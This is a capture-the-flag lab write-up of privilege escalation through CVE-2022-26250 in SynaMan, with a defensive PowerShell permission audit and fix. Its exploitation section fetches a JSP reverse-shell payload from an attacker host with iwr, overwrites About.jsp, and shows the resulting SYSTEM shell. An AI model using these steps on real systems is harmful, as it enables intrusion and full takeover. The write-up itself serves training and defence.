CVE-2022-26250


The target SynaMan instance has been identified as vulnerable to CVE-2022-26250, and the vulnerability has been manually confirmed.

CVE-2022-26250 is a weak-permissions vulnerability in Synametrics SynaMan up to version 5.1, classified as critical. The installation directory is modifiable by any authenticated user, so a low-privileged user can replace files that the SynaMan service (running as SYSTEM) will later load or execute, leading to local privilege escalation.

Exploit


PS C:\SynaMan\htdocs\webapps\ROOT> icacls C:\SynaMan\htdocs\webapps\ROOT
C:\SynaMan\htdocs\webapps\ROOT BUILTIN\Administrators:(I)(OI)(CI)(F)
                               NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               BUILTIN\Users:(I)(OI)(CI)(RX)
                               NT AUTHORITY\Authenticated Users:(I)(M)
                               NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
 
Successfully processed 1 files; Failed processing 0 files
 
PS C:\SynaMan\htdocs\webapps\ROOT> icacls C:\SynaMan\
C:\SynaMan\ BUILTIN\Administrators:(I)(OI)(CI)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            NT AUTHORITY\Authenticated Users:(I)(M)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
 
Successfully processed 1 files; Failed processing 0 files

The entire C:\SynaMan\ tree is writable by any authenticated user: NT AUTHORITY\Authenticated Users holds Modify (M) on the directory itself and, through the (OI)(CI)(IO) entry, on every file and subfolder beneath it, including the web root. The (I) flag shows these ACEs are inherited from the default ACL of the C:\ root; an application installed directly under C:\ rather than under Program Files inherits them unless its installer resets the ACL.
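The icacls check above is done by hand on two directories. The following PowerShell script is an added example (not part of the original writeup or of SynaMan) that generalises it: it walks an installation tree and reports every directory where a principal that any local user belongs to holds write-capable rights. The root path and the list of low-privilege principals are assumptions for the example and can be adjusted.

```powershell
# Added example, not from the original writeup: find directories under an
# install root where low-privilege principals hold write-capable rights,
# the condition shown by the icacls output for C:\SynaMan.
# Assumption: runs as any local user; $Root defaults to the SynaMan path.
param(
    [string]$Root = 'C:\SynaMan'
)

# Groups every interactive or authenticated user is a member of.
$LowPrivPrincipals = @(
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow changing or replacing content (icacls M, W, F and the
# individual write bits).
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-LowPrivWritableDirs {
    param([Parameter(Mandatory)][string]$Path)

    # Include the root itself, then every subdirectory.
    $dirs = @(Get-Item -LiteralPath $Path) +
            @(Get-ChildItem -LiteralPath $Path -Directory -Recurse -ErrorAction SilentlyContinue)

    foreach ($d in $dirs) {
        $acl = Get-Acl -LiteralPath $d.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { continue }

        foreach ($ace in $acl.Access) {
            # Only Allow ACEs for the low-privilege groups matter here.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Skip ACEs that grant no write-capable bit.
            if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }

            [pscustomobject]@{
                Path      = $d.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # $true means it came from a parent
            }
        }
    }
}

Get-LowPrivWritableDirs -Path $Root | Format-Table -AutoSize
```

On the target this lists C:\SynaMan and every directory beneath it, including htdocs\webapps\ROOT, with Authenticated Users holding Modify and Inherited set to $true. The corresponding fix, run as an administrator, is to break inheritance and grant only the intended principals, for example `icacls C:\SynaMan /inheritance:r /grant:r "BUILTIN\Administrators:(OI)(CI)F" "NT AUTHORITY\SYSTEM:(OI)(CI)F" "BUILTIN\Users:(OI)(CI)RX" /T`; rerunning the script afterwards should return nothing.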

Exploitation


Since no credentials are known at this point, access to the web application is limited. However, the About page (About.jsp in the web root) is served without authentication, which makes it a convenient file to overwrite.

PS C:\SynaMan\htdocs\webapps\ROOT> mv .\About.jsp .\About.jsp.bak
PS C:\SynaMan\htdocs\webapps\ROOT> iwr -Uri http://192.168.45.249/About.jsp -OutFile C:\SynaMan\htdocs\webapps\ROOT\About.jsp

This renames the original About.jsp (keeping a backup to restore later) and replaces it with a JSP payload fetched from the attacker host that connects back to 192.168.45.249 on port 4444.

With a listener waiting on port 4444, opening the About page in the browser makes the SynaMan web server compile and run the replaced JSP, so the payload executes with the privileges of the SynaMan service.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.219.168] 50393
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
 
C:\SynaMan> whoami
 whoami
nt authority\system
 
C:\SynaMan> hostname
 hostname
Fishyyy
 
C:\SynaMan> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.219.168
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.219.254

The shell runs as NT AUTHORITY\SYSTEM on the host Fishyyy (192.168.219.168): full system-level compromise from a low-privileged user, via nothing more than writable install-directory permissions.